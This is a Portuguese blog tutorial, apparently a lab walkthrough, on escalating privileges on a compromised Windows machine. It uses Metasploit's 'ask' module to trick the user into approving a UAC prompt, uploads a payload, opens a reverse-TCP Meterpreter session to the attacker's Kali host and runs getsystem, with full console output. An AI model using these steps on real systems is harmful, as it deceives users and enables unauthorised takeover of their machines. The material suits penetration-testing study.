escala de privilegios windows

Suponha que invadiu um computador, onde reparou que o usuário que estava logado, era um usuário comum ou seja não era administrador do sistema. Talvez realizou várias tentativas de ataques procurando paths vulneráveis a escalação de privilégios porém sem sucesso.

Em ultimo caso, se não houver nenhuma vulnerabilidades de escalação de privilégios, é obter o privilegio de sistema interagindo com o usuário. Em tecnologia esta técnica é chamada de engenharia social. Onde iremos enviar uma requisição via UAC para o usuario, caso recebermos a resposta com as informações necessárias, conseguiremos o usuário administrator e com isso será bem fácil obter privilegio de sistema.

Abaixo vou estar demonstrando e explicando sobre cada passo realizado.

É importante ressaltar que para seguir os passos citados abaixo, você já deve ter o acesso da máquina e está com a sessão do meterpreter em aberto, pois este lab é baseado em pós-exploração.
escala de privilegios windows
orientaçãoemtecnologia.com




















  • 1º passo: usar o exploit de ask para solicitar a senha adminitrativa via UAC ao usuario "use exploit/windows/local/ask".
  • 2º passo: Realizar configurações de sessões, host local e porta local. No meu caso configurei na sessão 5, pois o meterpreter está na sessão 5. configurei o lhost no ip do meu kali e configurei a porta 10 para a escuta.
  • 3º passo: Após configurações e set, digite o comando exploit para iniciar o processo de exploração com UAC.
  • 4º passo: Após receber a sessão do meterpreter, digite getsystem para obter o privilégio de sistema.

windows privilege escalation


msf exploit(windows/local/ask) > sessions 5
[*] Starting interaction with 5...
meterpreter > getuid
Server username: WIN-MPA05BP9C25\usuario comum
meterpreter >
msf exploit(windows/local/ask) > sessions -l
Active sessions
===============
  Id  Name  Type                     Information                                      Connection
  --  ----  ----                     -----------                                      ----------
  5         meterpreter x86/windows  WIN-MPA05BP9C25\usuario comum @ WIN-MPA05BP9C25  192.168.190.134:2 -> 192.168.190.128:49511 (192.168.190.128)
msf exploit(windows/local/ask) > use exploit/windows/local/ask 
msf exploit(windows/local/ask) > show options 
Module options (exploit/windows/local/ask):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILENAME                    no        File name on disk
   PATH                        no        Location on disk, %TEMP% used if not set
   SESSION    2                yes       The session to run this module on.
   TECHNIQUE  EXE              yes       Technique to use (Accepted: PSH, EXE)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.190.134  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Windows
msf exploit(windows/local/ask) > set session 5
session => 5
msf exploit(windows/local/ask) > set lport 10
lport => 10
msf exploit(windows/local/ask) > exploit
[*] Started reverse TCP handler on 192.168.190.134:10 
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading gHuEgWSBCBok.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (179779 bytes) to 192.168.190.128
[*] Meterpreter session 6 opened (192.168.190.134:10 -> 192.168.190.128:49599) at 2020-01-31 23:46:06 -0200
meterpreter > 
meterpreter > getuid
Server username: WIN-MPA05BP9C25\Administrador
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: AUTORIDADE NT\SISTEMA
meterpreter > 
Neste vídeo aula, estarei mostrando na pratica sobre cada passo realizado de acordo com as técnicas de ataques demonstrada acima. Para melhor acompanhar, assista esta aula.

Postado por, Josué Pedro


Formado em Sistema da Informação pela Universidade Nove de Julho, Pós graduado em Cyber Security pela Impacta Parceria com a Daryus.


Há um bom tempo que trabalha na Área da tecnologia da Informação e é criador de conteúdos para canal de youtube e mídia social.


Tem auto conhecimento em Tecnologia, Mídia Social, Marketing Digital,  SEO, Goolge Adword, Google Adsense,  Google Master.

Nas horas disponível, trabalha como freelancer procurando bugs vulneráveis em sistemas através da plataforma "Hacker One". 


Trabalha também com freelancer em projetos relacionado a tecnologia através da plataforma Workana.

Comentários